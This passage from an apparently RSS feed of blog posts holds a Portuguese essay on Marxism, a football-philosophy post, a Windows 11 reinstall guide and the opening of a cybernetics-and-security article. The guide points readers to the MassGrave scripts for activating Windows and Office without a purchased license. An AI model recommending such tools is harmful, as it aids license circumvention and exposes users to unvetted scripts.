<blockquote><p>Até mesmo os fantasmas têm um significado e exigem interpretação, pois sempre aparecem no contexto de uma relação vivida com a realidade social e, portanto, não são coisas mentais e opacas, separadas do resto. Ao contrário, como as expressões faciais ou a fala, carregam consigo um significado oculto que os desmascara; não escondem algo a menos que o revelem.</p></blockquote>

<p>e</p>

<blockquote><p>a literatura nunca expressa os postulados de uma única classe, mas sim o encontro e, se necessário, o contraste com os outros: é, portanto, sempre um reflexo do todo, mesmo que a perspectiva de classe a distorça.</p></blockquote>

<p>Merleau-Ponty e Lukács (pelo menos o de 1923, do História e Consciência de Classe), concordam que a dialética histórica não é impermeável à experiência. Nenhuma experiência histórica deve ser descartada de antemão por razões doutrinárias. Até os erros e derrotas precisam ser compreendidos como momentos do processo histórico: “O falso é um momento do verdadeiro, simultaneamente falso e não falso.”</p>

<p>Essa atenção a experiência permite que o Marxismo seja plural e atento às conjunturas e movimentos sociais distintos. Não concordo com o uso do marxismo soviético como receituário do marxismo para o contexto histórico do Brasil atual… Isso é antimarxista em alguma medida, visto que Marx, no 18 Brumário, já explicava que não devemos conjurar espíritos do passado a fim de encenar um momento distinto da história venerando revolucionários do passado como se tivessem uma receita pronta e acabada:</p>

<blockquote><p>Os homens fazem a sua própria história, mas não a fazem por livre vontade; não a fazem sob circunstâncias de sua escolha, e sim sob aquelas com as quais se defrontam diretamente, legadas e transmitidas pelo passado. A tradição de todas as gerações mortas oprime como um pesadelo o cérebro dos vivos. E justamente quando parecem empenhados em revolucionar a si mesmos e às coisas, em criar algo que jamais existiu, precisamente nesses períodos de crise revolucionária, eles conjuram ansiosamente em seu auxílio os espíritos do passado, tomando-lhes emprestados os nomes, os gritos de guerra e as roupagens, a fim de encenar a nova cena da história mundial nesse disfarce venerável e nessa linguagem emprestada.</p></blockquote>

<p>Sei que soa muito mais fácil angariar uma militância engajada a dotando de certezas… É realmente mais difícil convidar pessoas a fazer uma revolução falando: “Vamos nos unir para construir o novo, o futuro é incerto, nossa vitória não está garantida, mas vale a pena o risco por essa causa”, mas dentro de uma análise concreta dos movimentos reais da história, é isso o que temos. O sistema que durante décadas se apresentou como a realização histórica inevitável do marxismo acabou implodindo por dentro. A União Soviética se dividiu e a Rússia foi revertida à economia de mercado de uma forma repentina, traumática, que causou danos relevantes ao seu tecido social e a de parceiros, como Cuba.</p>

<p>A China caminhou para uma forma peculiar de capitalismo de Estado ou, para seus defensores, de socialismo de mercado, na qual coexistem planejamento estatal, grandes empresas públicas e uma poderosa classe capitalista privada (inclusive com uma expressiva classe de bilionários privados operando segundo as dinâmicas tradicionais da acumulação capitalista). A classe gerencial chinesa, a burocracia estatal, tem mais autonomia em relação a classe dominante capitalista e maior capacidade de planejamento, de coordenar o desenvolvimento estratégico do País, em relação a todos os outros estados-nações sob o modo de produção capitalista.</p>

<p>O que eu poderia dizer para o marxismo das possibilidades, é que embora o socialismo não seja uma certeza histórica, seja uma possibilidade, mesmo que experiências socialistas plurais, prolíficas e diferenciadas marxistas sejam derrotadas, o empenho da militância em criar o novo não é em vão.</p>

<p>Um humilde exemplo que sempre ofereço e tento lembrar, que escapa totalmente do marxismo soviético canônico, é a da pequena municipalidade da Viena Vermelha no período entre Guerras, como consta do Livro V, da história do Marxismo, de Hobsbawm.</p>

<p>Os austromarxistas fizeram uma leitura brilhante de seu contexto histórico e das possibilidades políticas que se abriam com a recente ampliação do sufrágio. Por meio das vias eleitorais, conquistaram o governo municipal de Viena e desenvolveram uma forma criativa de gestão socialista que transformou profundamente a cidade. A tributação progressiva e os programas sociais ergueram, em pouco mais de uma década, durante o período entre guerras, um verdadeiro monumento ao socialismo democrático.</p>

<p>Milhares de trabalhadores foram retirados de cortiços insalubres e passaram a ter acesso a moradias de qualidade inédita para a época. Conjuntos habitacionais como o Karl-Marx-Hof permanecem de pé e continuam cumprindo sua função social até hoje. Ao mesmo tempo, a Viena Vermelha expandiu o acesso à saúde pública, às creches, à educação e a diversas outras políticas sociais, antecipando iniciativas que mais tarde se difundiriam por diferentes países europeus.</p>

<p>Após a derrota da experiência austromarxista diante do avanço do austrofascismo, e depois da anexação da Áustria pelo nazismo, muitos poderiam imaginar que aquela experiência havia desaparecido completamente da história. No entanto, após a derrota do regime nazista, a Constituição austríaca (cuja elaboração contou também com a participação dos austromarxistas) foi restabelecida, e muitas das instituições, políticas públicas e conquistas sociais da Viena Vermelha continuaram presentes na vida urbana vienense.</p>

<p>A experiência da Viena Vermelha tornou-se uma importante referência para diversas políticas sociais implementadas na Europa do pós-guerra, especialmente nas áreas de habitação, saúde e planejamento urbano.</p>

<p>A história não precisa garantir o triunfo inevitável do socialismo para que a luta por transformações sociais valha a pena. O simples fato de que algo novo possa surgir, alterar a experiência humana e permanecer vivo para além de seus criadores já é razão suficiente para agir.</p>

<p>#Marxismo #Dialética #MarxismoOcidental #Filosofia #História #MaterialismoHistórico</p>
]]></content:encoded>
      <author>Nomos</author>
      <guid>https://infosec.press/read/a/uzj1xlxfm7</guid>
      <pubDate>Sat, 20 Jun 2026 19:50:11 +0000</pubDate>
    </item>
    <item>
      <title>Espanto filosófico do futebol</title>
      <link>https://infosec.press/sirius/espanto-filosofico-do-futebol</link>
      <description>&lt;![CDATA[Haaland, Messi e Mbappé&#xA;!--more--&#xA;Após as atuações de gala de Mbappé, Messi e Haaland por suas seleções, com dois gols do francês contra Senegal, um hat-trick do argentino diante da Argélia e dois gols do norueguês contra o Iraque, resolvi fazer algumas ponderações futebolístico-filosóficas, ao estilo do futebol filosófico do Monty Python.&#xA;&#xA;Messi, Mbappé e Haaland encarnam a exemplaridade atlética máxima em suas seleções. Na visão de Sloterdijk, que propõe uma ordem antropotécnica, eles seriam os &#34;aristocratas do esforço&#34; no topo da acrópole competitiva global. Mas acho que o treino e o esforço explicam nossa admiração em apenas uma dimensão. &#xA;&#xA;O Messi do hat-trick de ontem, por exemplo, já não depende tanto do vigor físico; ele é como uma entidade incorporada ao campo, dotada de uma percepção das possibilidades que excede a dos demais, exibindo uma graça que escapa à pura força e agilidade do Haaland ou Mbappé. &#xA;&#xA;Tenho a teoria de que o futebol cativa tantas pessoas porque indivíduos assim convertem a superação humana numa plasticidade sublime, uma potência que comove, arrebata e causa espanto. Isso se manifesta nos gritos de espanto da torcidaa, com um sonoro &#34;- OOoooooohhh&#34; coletivo, quando esses craques atravessam as linhas de defesa ou quando um Messi encontra um passe invisível para os demais, produzindo uma ruptura momentânea nos limites do que julgavam possível. &#xA;&#xA;Os espectadores na arquibancada experimentam algo próximo do espanto filosófico: &#34;como isso foi possível?&#34; E Sócrates, segundo Platão, já nos lembrava que a filosofia nasce justamente da nossa capacidade de se espantar (thauma). &#xA;&#xA;#Futebol #Filosofia #Antropotécnica #Estética #Sublime]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://www.band.com.br/_next/image?url=https%3A%2F%2Fimg.band.com.br%2Fimage%2F2026%2F06%2F17%2Fhaaland-messi-e-mbappe-brilharam-no-mesmo-dia-33440.png&amp;w=1080&amp;q=75" alt="Haaland, Messi e Mbappé">

Após as atuações de gala de Mbappé, Messi e Haaland por suas seleções, com dois gols do francês contra Senegal, um hat-trick do argentino diante da Argélia e dois gols do norueguês contra o Iraque, resolvi fazer algumas ponderações futebolístico-filosóficas, ao estilo do futebol filosófico do Monty Python.</p>

<p>Messi, Mbappé e Haaland encarnam a exemplaridade atlética máxima em suas seleções. Na visão de Sloterdijk, que propõe uma ordem antropotécnica, eles seriam os “aristocratas do esforço” no topo da acrópole competitiva global. Mas acho que o treino e o esforço explicam nossa admiração em apenas uma dimensão.</p>

<p>O Messi do hat-trick de ontem, por exemplo, já não depende tanto do vigor físico; ele é como uma entidade incorporada ao campo, dotada de uma percepção das possibilidades que excede a dos demais, exibindo uma graça que escapa à pura força e agilidade do Haaland ou Mbappé.</p>

<p>Tenho a teoria de que o futebol cativa tantas pessoas porque indivíduos assim convertem a superação humana numa plasticidade sublime, uma potência que comove, arrebata e causa espanto. Isso se manifesta nos gritos de espanto da torcidaa, com um sonoro “– OOoooooohhh” coletivo, quando esses craques atravessam as linhas de defesa ou quando um Messi encontra um passe invisível para os demais, produzindo uma ruptura momentânea nos limites do que julgavam possível.</p>

<p>Os espectadores na arquibancada experimentam algo próximo do espanto filosófico: “como isso foi possível?” E Sócrates, segundo Platão, já nos lembrava que a filosofia nasce justamente da nossa capacidade de se espantar (thauma).</p>

<p>#Futebol #Filosofia #Antropotécnica #Estética #Sublime</p>
]]></content:encoded>
      <author>Sirius</author>
      <guid>https://infosec.press/read/a/jkq694o2vz</guid>
      <pubDate>Wed, 17 Jun 2026 17:47:11 +0000</pubDate>
    </item>
    <item>
      <title>Do you have a new/new-to-you/used Windows device that needs a fresh start?</title>
      <link>https://infosec.press/drsbaitso/do-you-have-a-new-new-to-you-used-windows-device-that-needs-a-fresh-start</link>
      <description>&lt;![CDATA[Do you have a new/new-to-you/used Windows device that needs a fresh start? Here&#39;s the process I&#39;ve refined for myself over the years to get the best, most usable device possible. Start with zero added crap like McAfee or manufacturer sales programs. &#xA;&#xA;You&#39;ll need a couple of USB flash drives for this process. Grab one that&#39;s at least 16 GB (install media) and one that&#39;s at least 32 GB (data backup). If you&#39;re going to be doing this often, you can replace the install media flash drive with an IODD device. I&#39;ve got one with a 1TB SSD with a bunch of Windows and Linux ISOs, a separate folder for drivers, and a little 1 GB FAT32 partition specifically for holding BIOS updates.&#xA;&#xA;Step 0: BACK UP YOUR DATA. On a separate, external device like the 32 GB or larger flash drive. Copy your user profile(s) and set it aside. You can just copy C:\Users and get 99% of things you&#39;ll care about. Get one that&#39;s visually distinct, label it, and put it somewhere else so you don&#39;t overwrite it. Do this even if you have multiple drives in the system. Don&#39;t count on your ability to keep internal storage devices straight. You can skip this step if you&#39;re pulling the device straight out of the box. &#xA;&#xA;Step 1: Prepare Media. This requires a working computer.&#xA;&#xA;Microsoft provides clean (for Microsoft) Windows 11 ISOs directly on their website: https://www.microsoft.com/en-us/software-download/windows11 Download the ISO directly from Microsoft. Don&#39;t download the ISO from any third-party sites. You can also use the Microsoft &#34;Create Windows 11 Installation Media&#34; program which will automate a lot of the process.&#xA;&#xA;With the Windows 11 ISO, you can use Rufus to create your Win11 install flash drive. Rufus can do some fun things like kill the Microsoft Account requirement. &#xA;&#xA;MAKE SURE YOUR INSTALL USB DEVICE ISN&#39;T YOUR BACKUPS USB DEVICE&#xA;&#xA;You can also just dump multiple ISOs on your IODD. I keep older versions of Win11 install ISOs around specifically so I can just use the bypassnro trick to create a local account, but there will probably always be some option to get around the online account requirements. &#xA;&#xA;Step 2: In addition to Windows, there are a couple of other things you want to grab. &#xA;&#xA;Check to make sure you have the latest UEFI (AKA/FKA BIOS) version for your device. Get this from the vendor with their name on the box directly from their website. Download the version specific to your model/serial number.&#xA;&#xA;Also grab the latest system/platform, graphics, and network/wifi drivers from the manufacturer&#39;s website. 90% of these &#34;executables&#34; will be zip files that you can extract and point Windows at the folders later. &#xA;&#xA;Lastly, you want to grab other stuff you want to install immediately. For me, that&#39;s Privacy.Sexy, WinAeroTweaker, Vivaldi browser, a Copilot Killer Script and the latest releases of PowerShell, Windows Terminal, and PowerToys.&#xA;&#xA;After you create your install USB, you can copy the BIOS update, drivers, and miscellaneous programs to it. &#xA;&#xA;Step 3: Update UEFI/BIOS. Specifics are going to depend on your device and its process. Make sure you&#39;re on the most recent version, especially because of the Secure Boot certificate expirations. &#xA;&#xA;Step 4: Boot Windows 11 Installer. Start fresh, blow away everything on the existing internal drive. The default manufacturer programs are almost never worth saving. The restore partitions are going to have old crap that will be replaced almost immediately when you start updating.&#xA;&#xA;Modern devices won&#39;t have a Windows license sticker; the key is baked into the UEFI. Sometimes the Windows installer will pick up the right edition (home/pro/enterprise), sometimes you have to select it yourself. Either way, you can install Win11 without needing to provide a license key at this step. See also the MAS further down.&#xA;&#xA;Step 5: Install drivers for devices Windows didn&#39;t handle during installation. The old Device Manager still exists. Right-click on the Start button/Windows logo, and select &#34;Computer Management&#34;. There you can see devices, including ones that don&#39;t have working drivers. Either run the executables you downloaded earlier, or right-click on the problem device and &#34;Update Driver&#34;, pointing it at the folders you unpacked. &#xA;&#xA;Step 6: Kill the annoying semi-setup bullshit Windows pulls after updates. Settings app -  System -  Notifications -  Additional Settings -  Uncheck &#34;Suggest ways to get the most out of Windows and finish setting up this device&#34; and &#34;Get tips and suggestions when using Windows&#34;. These are the terrible interruptions Microsoft has started imposing after some updates that will do the absolute bullshit like tricking you into using Onedrive or switching your browser back to Edge. They&#39;re gross and terrible and if we had working antitrust enforcement they&#39;d get another deserved crotch-kicking over it. &#xA;&#xA;Step 7: Run the RemoveWindowsAI script. Kill it all, roll back to &#34;classic&#34; Paint/Notepad/Snipping Tool. Uninstall a bunch of MS garbage like Onedrive, Teams, the Office stub, and whatever else you don&#39;t need.&#xA;&#xA;Step 8: Install PowerShell7/Terminal/PowerToys, configure to taste. You can install MS Office here too, if you need it. If you don&#39;t, we&#39;ll install LibreOffice later. &#xA;&#xA;Step 9: Update Windows. Settings -  Windows Updates -  Check for Updates and Advanced Options -  Optional Updates. Just grab everything, get to the latest version. Check &#34;Receive updates for other Microsoft products&#34; too. This covers MS Office and PowerShell. This will take a while, and make sure the bullshit in step 6 didn&#39;t get re-enabled.&#xA;&#xA;Step 10: Run the RemoveWindowsAI script again, because &#34;no&#34; isn&#39;t a term Microsoft understands. &#xA;&#xA;Step 11: Install Vivaldi, set as default browser, configure as desired. For me that&#39;s a dark mode theme, crank the built-in ad-blocker to max, make Settings a tab instead of its own window, setting the search engines to DuckDuckGo, and install the extensions for 1Password, PrivacyBadger, and uBlock Origin. &#xA;&#xA;Step 12: Install/run Privacy.Sexy and WinAeroTweaker. &#xA;&#xA;Privacy.Sexy can break things, so I normally just use the &#34;Standard&#34; setting. I&#39;ve had good luck with its revert options when it DID break things, but your mileage will vary.&#xA;&#xA;WinAeroTweaker will restore some older Windows defaults to their better options. Once you find settings you like you can save and load those settings to a simple file. &#xA;&#xA;Step 13: Verify Windows activation. Settings -  System -  About -  Product Key and Activation. The system has probably already activated itself in the background. If not, do it now. Or not. I&#39;m not the software police. You can also use the MassGrave Activation Scripts, at your own risk. &#xA;&#xA;USE AT YOUR OWN RISK: Massgrave.dev has published the &#34;Microsoft Activation Scripts (MAS)&#34; on MassGravel GitHub: https://github.com/massgravel/Microsoft-Activation-Scripts These can be used to activate Windows and Office through a couple different methods. &#xA;&#xA;Step 14: Everything else. I&#39;ve used Ninite for decades to bootstrap a bare computer into usability. Check the boxes, get an executable that will download and install the apps with the best defaults. Only criticism is the free version dumps a bunch of icons on your desktop.&#xA;&#xA;My personal absolute minimum app list is this:&#xA;Vivaldi&#xA;Firefox&#xA;WinDirStat&#xA;7-Zip&#xA;VLC&#xA;Notepad++&#xA;&#xA;For utility, I&#39;ll add these:&#xA;Paint.NET&#xA;IrfanView&#xA;LibreOffice&#xA;FileZilla&#xA;&#xA;You can keep the Ninite executable around and rerun it later to update existing installs. The EXE isn&#39;t locked to a specific machine, so if you&#39;re doing several machines you can just dump it on the install flash drive and run it directly.&#xA;&#xA;Manufacturer utilities like Dell&#39;s SupportAssist can be okay, but you&#39;ve got to keep a close eye on them to make sure they don&#39;t do something dumb like install McAfee for &#34;free&#34;.&#xA;&#xA;Step 15: Restore your documents/pictures/music/miscellaneous backed-up data. Now&#39;s a good time to make sure you have a comprehensive and tested backup scheme for your data too. &#xA;&#xA;Now you should have a usable, fast Windows 11 device with the minimum Microsoft bullshit hanging around. &#xA;&#xA;#Windows #Microsoft #Laptop #PC #Security #Reinstall #Copilot #Malware #Dell #HP #Lenovo #ASUS #Acer ]]&gt;</description>
      <content:encoded><![CDATA[<p>Do you have a new/new-to-you/used Windows device that needs a fresh start? Here&#39;s the process I&#39;ve refined for myself over the years to get the best, most usable device possible. Start with zero added crap like McAfee or manufacturer sales programs.</p>

<p>You&#39;ll need a couple of USB flash drives for this process. Grab one that&#39;s at least 16 GB (install media) and one that&#39;s at least 32 GB (data backup). If you&#39;re going to be doing this often, you can replace the install media flash drive with <a href="https://www.amazon.com/stores/page/924E4905-B6C0-4750-8728-6C5F95ACAEEA" rel="nofollow">an IODD device</a>. I&#39;ve got one with a 1TB SSD with a bunch of Windows and Linux ISOs, a separate folder for drivers, and a little 1 GB FAT32 partition specifically for holding BIOS updates.</p>

<p>Step 0: <em><strong>BACK UP YOUR DATA</strong></em>. On a separate, external device like the 32 GB or larger flash drive. Copy your user profile(s) and set it aside. You can just copy C:\Users and get 99% of things you&#39;ll care about. Get one that&#39;s visually distinct, label it, and put it somewhere else so you don&#39;t overwrite it. Do this even if you have multiple drives in the system. Don&#39;t count on your ability to keep internal storage devices straight. You can skip this step if you&#39;re pulling the device straight out of the box.</p>

<p>Step 1: Prepare Media. This requires <em>a</em> working computer.</p>

<p>Microsoft provides clean (for Microsoft) Windows 11 ISOs directly on their website: <a href="https://www.microsoft.com/en-us/software-download/windows11" rel="nofollow">https://www.microsoft.com/en-us/software-download/windows11</a> Download the ISO directly from Microsoft. Don&#39;t download the ISO from any third-party sites. You can also use the Microsoft “Create Windows 11 Installation Media” program which will automate a lot of the process.</p>

<p>With the Windows 11 ISO, you can use <a href="https://rufus.ie/en/" rel="nofollow">Rufus</a> to create your Win11 install flash drive. Rufus can do some fun things like kill the Microsoft Account requirement.</p>

<p><strong>MAKE SURE YOUR INSTALL USB DEVICE ISN&#39;T YOUR BACKUPS USB DEVICE</strong></p>

<p>You can also just dump multiple ISOs on your IODD. I keep older versions of Win11 install ISOs around specifically so I can just use the bypassnro trick to create a local account, but there will probably always be some option to get around the online account requirements.</p>

<p>Step 2: In addition to Windows, there are a couple of other things you want to grab.</p>

<p>Check to make sure you have the latest UEFI (AKA/FKA BIOS) version for your device. Get this from the vendor with their name on the box directly from their website. Download the version specific to your model/serial number.</p>

<p>Also grab the latest system/platform, graphics, and network/wifi drivers from the manufacturer&#39;s website. 90% of these “executables” will be zip files that you can extract and point Windows at the folders later.</p>

<p>Lastly, you want to grab other stuff you want to install immediately. For me, that&#39;s <a href="https://privacy.sexy" rel="nofollow">Privacy.Sexy</a>, <a href="https://winaerotweaker.com" rel="nofollow">WinAeroTweaker</a>, <a href="https://vivaldi.com" rel="nofollow">Vivaldi browser</a>, <a href="https://github.com/zoicware/RemoveWindowsAI" rel="nofollow">a Copilot Killer Script</a> and the latest releases of <a href="https://github.com/PowerShell/PowerShell/releases/" rel="nofollow">PowerShell</a>, <a href="https://github.com/microsoft/terminal/releases/" rel="nofollow">Windows Terminal</a>, and <a href="https://github.com/microsoft/PowerToys/releases/" rel="nofollow">PowerToys</a>.</p>

<p><em>After</em> you create your install USB, you can copy the BIOS update, drivers, and miscellaneous programs to it.</p>

<p>Step 3: Update UEFI/BIOS. Specifics are going to depend on your device and its process. Make sure you&#39;re on the most recent version, especially because of the <a href="https://support.microsoft.com/en-us/topic/windows-secure-boot-certificate-expiration-and-ca-updates-7ff40d33-95dc-4c3c-8725-a9b95457578e" rel="nofollow">Secure Boot certificate expirations</a>.</p>

<p>Step 4: Boot Windows 11 Installer. Start fresh, blow away everything on the existing internal drive. The default manufacturer programs are almost never worth saving. The restore partitions are going to have old crap that will be replaced almost immediately when you start updating.</p>

<p>Modern devices won&#39;t have a Windows license sticker; the key is baked into the UEFI. Sometimes the Windows installer will pick up the right edition (home/pro/enterprise), sometimes you have to select it yourself. Either way, you can install Win11 without needing to provide a license key at this step. See also the MAS further down.</p>

<p>Step 5: Install drivers for devices Windows didn&#39;t handle during installation. The old Device Manager still exists. Right-click on the Start button/Windows logo, and select “Computer Management”. There you can see devices, including ones that don&#39;t have working drivers. Either run the executables you downloaded earlier, or right-click on the problem device and “Update Driver”, pointing it at the folders you unpacked.</p>

<p>Step 6: Kill the annoying semi-setup bullshit Windows pulls after updates. Settings app –&gt; System –&gt; Notifications –&gt; Additional Settings –&gt; Uncheck “Suggest ways to get the most out of Windows and finish setting up this device” and “Get tips and suggestions when using Windows”. These are the terrible interruptions Microsoft has started imposing after some updates that will do the absolute bullshit like tricking you into using Onedrive or switching your browser back to Edge. They&#39;re gross and terrible and if we had working antitrust enforcement they&#39;d get another deserved crotch-kicking over it.</p>

<p>Step 7: Run the RemoveWindowsAI script. Kill it all, roll back to “classic” Paint/Notepad/Snipping Tool. Uninstall a bunch of MS garbage like Onedrive, Teams, the Office stub, and whatever else you don&#39;t need.</p>

<p>Step 8: Install PowerShell7/Terminal/PowerToys, configure to taste. You can install MS Office here too, if you need it. If you don&#39;t, we&#39;ll install LibreOffice later.</p>

<p>Step 9: Update Windows. Settings –&gt; Windows Updates –&gt; Check for Updates and Advanced Options –&gt; Optional Updates. Just grab everything, get to the latest version. Check “Receive updates for other Microsoft products” too. This covers MS Office and PowerShell. This will take a while, and make sure the bullshit in step 6 didn&#39;t get re-enabled.</p>

<p>Step 10: Run the RemoveWindowsAI script again, because “no” isn&#39;t a term Microsoft understands.</p>

<p>Step 11: Install Vivaldi, set as default browser, configure as desired. For me that&#39;s a dark mode theme, crank the built-in ad-blocker to max, make Settings a tab instead of its own window, setting the search engines to DuckDuckGo, and install the extensions for 1Password, PrivacyBadger, and uBlock Origin.</p>

<p>Step 12: Install/run Privacy.Sexy and WinAeroTweaker.</p>

<p>Privacy.Sexy can break things, so I normally just use the “Standard” setting. I&#39;ve had good luck with its revert options when it DID break things, but your mileage will vary.</p>

<p>WinAeroTweaker will restore some older Windows defaults to their better options. Once you find settings you like you can save and load those settings to a simple file.</p>

<p>Step 13: Verify Windows activation. Settings –&gt; System –&gt; About –&gt; Product Key and Activation. The system has <em>probably</em> already activated itself in the background. If not, do it now. Or not. I&#39;m not the software police. You can also use the MassGrave Activation Scripts, at your own risk.</p>

<p><strong>USE AT YOUR OWN RISK</strong>: Massgrave.dev has published the “Microsoft Activation Scripts (MAS)” on MassGravel GitHub: <a href="https://github.com/massgravel/Microsoft-Activation-Scripts" rel="nofollow">https://github.com/massgravel/Microsoft-Activation-Scripts</a> These can be used to activate Windows and Office through a couple different methods.</p>

<p>Step 14: Everything else. I&#39;ve used <a href="https://ninite.com" rel="nofollow">Ninite</a> for decades to bootstrap a bare computer into usability. Check the boxes, get an executable that will download and install the apps with the best defaults. Only criticism is the free version dumps a bunch of icons on your desktop.</p>

<p>My personal absolute minimum app list is this:
Vivaldi
Firefox
WinDirStat
7-Zip
VLC
Notepad++</p>

<p>For utility, I&#39;ll add these:
Paint.NET
IrfanView
LibreOffice
FileZilla</p>

<p>You can keep the Ninite executable around and rerun it later to update existing installs. The EXE isn&#39;t locked to a specific machine, so if you&#39;re doing several machines you can just dump it on the install flash drive and run it directly.</p>

<p>Manufacturer utilities like Dell&#39;s SupportAssist can be okay, but you&#39;ve got to keep a close eye on them to make sure they don&#39;t do something dumb like install McAfee for “free”.</p>

<p>Step 15: Restore your documents/pictures/music/miscellaneous backed-up data. Now&#39;s a good time to make sure you have a comprehensive and <em>tested</em> backup scheme for your data too.</p>

<p>Now you should have a usable, fast Windows 11 device with the minimum Microsoft bullshit hanging around.</p>

<p>#Windows #Microsoft #Laptop #PC #Security #Reinstall #Copilot #Malware #Dell #HP #Lenovo #ASUS #Acer</p>
]]></content:encoded>
      <author>Dr. Sbaitso</author>
      <guid>https://infosec.press/read/a/9qyfuyqt47</guid>
      <pubDate>Thu, 04 Jun 2026 17:04:24 +0000</pubDate>
    </item>
    <item>
      <title>Cybernetic Security: Adaptation, Regulation, and Complexity Management</title>
      <link>https://infosec.press/security-through-the-looking-glass/cybernetic-security-adaptation-regulation-and-complexity-management</link>
      <description>&lt;![CDATA[This is the second entry in a series. If you haven&#39;t read the previous one, now might be a good time. If you&#39;re all caught up, then let&#39;s get into it.&#xA;&#xA;Viable systems exist within an environment. They adapt to the environment, but they may also change the environment as they adapt and grow. Beavers evolved to build dams, and in doing so they changed the ecosystems in which they evolved. A successful company will change the market. A successful non-profit will change their domain. But even a stable company is only one entity within the environment. Other companies, NGOs, consumers, and the public sector all exist within this same environment. Regulations, technological advancement, and customer tastes all shift the environment.&#xA;&#xA;Within this dynamic environment, what are you doing to track changes that impact your viability? How are you connecting environmental changes, such as regulation, to internal constraints, such as those that drive compliance enforcement and verification?&#xA;&#xA;A security program will need to focus on a specific subset of this question. How do you monitor threat actors? The evolution of threat actors and their attack profiles must inform your risk model and prioritization. As defenses evolve, threat actors adapt and their attack patterns change. How do you collect data? How do you process it into intelligence that&#39;s actionable by people on your team?&#xA;&#xA;Similarly, a security program will need a mechanism to track external changes to its attack surface in the form of supply chain risk management. What mechanisms do you have in place to track vulnerabilities in third party libraries, applications, and appliances that you use? How do you make sure that information (and specifically that information, not a flood of false positives) gets to people who can act on it?&#xA;&#xA;We will come back to threat actors and vulnerability management in other articles.&#xA;&#xA;Keeping track of you constraints as they evolve is only half of the constraint management equation. The other half is algedonic signaling. How do you know when constraints are violated?&#xA;&#xA;In the body, an algedonic signal is a basic &#34;pleasure or pain&#34; signal, like those we started with. When your body is hungry, you feel it. When you get hungry enough, it hurts. The signal isn&#39;t detailed. It doesn&#39;t provide much information. It&#39;s simple and generally easy to investigate. Many signals, such as hunger, are intuitive. We learn to understand them immediately and without investigation. &#xA;&#xA;All constraints should be tied to &#34;algedonic&#34; signals that trigger when they violated. But are they? If you&#39;ve recorded your constants (as described in the previous article) then you can perform a gap analysis.&#xA;&#xA;For each constraint you have identified, write down the signals that fire when those constraints are violated. For any gaps you identify, and figure out a plan to close them. Are there constraints you have listed that you would feel comfortable not being alerted of in case they are violated? Those are not really constraints (at least not at your level) and they should be removed from your constraint list.&#xA;&#xA;Anyone who has worked in tech long enough has seen some variation of alarm fatigue. Perhaps it has even been you who has had an email filtering rule that dumps alerts into a folder that is periodically cleared without any messages ever being read. Many security engineers will have had the experience of pointing to a vulnerability found by some automated scanner or other, a vulnerability which has since been then verified by a security engineer, and asking, &#34;why was this been marked as a false positive?&#34; Perhaps you&#39;ve observed to someone frantically clicking through a series of dire warnings, recognizing that the warnings intended to stop them have simply trained them to click fast without thinking. Too many signals can overwhelm a system. Notice that I&#39;m not specifying spurious signals. Accuracy is also a problem, but sheer volume of accurate signals can be enough.&#xA;&#xA;Then what is the mechanism by which signals are reduced? Common frameworks can address common vulnerabilities. Many security programs will look for security violations: insecure software being used, vulnerabilities in software being developed, and so on. There are infinitely many ways to implement software insecurely. There may well be as many ways to implement software securely. Sorting between these sets requires tremendous knowledge and has a high probability of failure. By restricting the definition of &#34;secure&#34; as complying with a specific set of vetted patterns, software, hardware, configurations, and the like, the verification work is reduced.&#xA;&#xA;Security Engineering can work on identifying common problems, addressing them with vetted patterns, and ensuring deployed patterns are updated as needed. This internal optimization work helps make the external signals around supply chain risk into something manageable. These restrictions are enforced not by complete refusal to use software, hardware, or configurations not explicitly allowed, but by adding friction, in terms of additional auditing or monitoring requirements, for teams trying to use them. Critical deviations will still be possible, at a cost, and most users will choose the path of least resistance.&#xA;&#xA;Compliance work may revolve around understanding what regulations apply to software, what assets regulatory bodies need, and making sure those assets can be delivered. But it can be easy to miss that compliance can reduce regulatory risk through early intervention. By providing guidance that allows software to be designed in a way that avoids falling under regulation, or by concentrating regulatory risk in a smaller set of components, complexity, and the risk of signal overwhelm, can be reduced.&#xA;&#xA;While cybernetics foregrounds the importance of complexity management, encapsulated as Ashby&#39;s Law of Requisite Variety, security program leadership can struggle to see the forest for the trees. In the frantic struggle to fight all the fires, it can be difficult to even notice the larger patterns. This is exactly where cybernetics can help us most.&#xA;&#xA;The VSM defines a set of metasystemic subsystems that manage any system. In the first article we talked about the system itself as an entity surviving within and adapting to an environment. We connected that to the Identity subsystem, and how invariants inform constraints through identity.&#xA;&#xA;In this article, thus far, we have talked more about that dynamic environment and how we need an Awareness subsystem to track environmental changes. We&#39;ve also talked about managing complexity through synergy using an Optimization subsystem. This leaves two more metasystemic components to cover: Internal Audit and Learning, and Harmonization. Before we talk about those, let&#39;s jump down the stack one more time. What are these subsystems learning about, auditing, and harmonizing? All of these metasystemic functions exist to support the Operational Units. Operational Units &#34;do all the work that keeps the system alive.&#34; In the body these are the muscles and organs that breath air, find food, digest food, and remove waste.&#xA;&#xA;While the brain, the metasystem, directs the activity, it is the rest of the body that realizes that activity. It is important to keep this fact in mind as we try to understand the role of security in an organization. With this in mind, let&#39;s return to where we were.&#xA;&#xA;The Optimization subsystem can passively coordinate optimization opportunities that are identified by subsystems, but it can also look actively collect data. Internal Audit and Learning is a subsystem of optimization that performs audits and looks for anomalies. Security folks may well be taking notice, recognizing some of our own work in this subsystem. But it&#39;s a little more complex than that. Let&#39;s talk about the Harmonization subsystem. &#xA;&#xA;The function of the Harmonization subsystem is, essentially, to keep operating units from interfering with each other. If Operational Units are sharing compute resources, for example, Harmonization would include things like permissions and quotas. The VSM says that operational units should have maximal autonomy, but each Operational Unit must be prevented from threatening the viability of the system itself.&#xA;&#xA;Now we, security, can really see ourselves in our familiar role with our familiar problem. Each operational unit may be trying to create a product, ship software or hardware, or to provide a service, but in doing so they can increase the attack surface. Promotion driven development may push team leads to compete to get software out faster and cheaper, incentivizing them to cut corners wherever they can. They ask if they can reduce the scope of a review, or push now and fix later. They may even push features that change the threat model but are, somehow, also &#34;too minor for a security review.&#34;&#xA;&#xA;They each individually peruse their own objectives, and in doing so threaten the security of the organization as a whole. But when vulnerabilities are found, and perhaps even exploited, within a team&#39;s code the company as a whole bears the burden. Isn&#39;t it interesting that security tends to behave similarly to police, when, in actuality, our job is that of commons management. &#xA;&#xA;Customer trust and internal funds are parts of the internal commons threatened by through a company&#39;s collective attack surface. The job of security is to coordinate teams across the company to ensure attack surface is minimized. Security works to protect customer trust from reputational threats, and funds from regulatory action and illegitimate compute usage.&#xA;&#xA;Companies mature enough to understand that &#34;policy enforcement&#34; 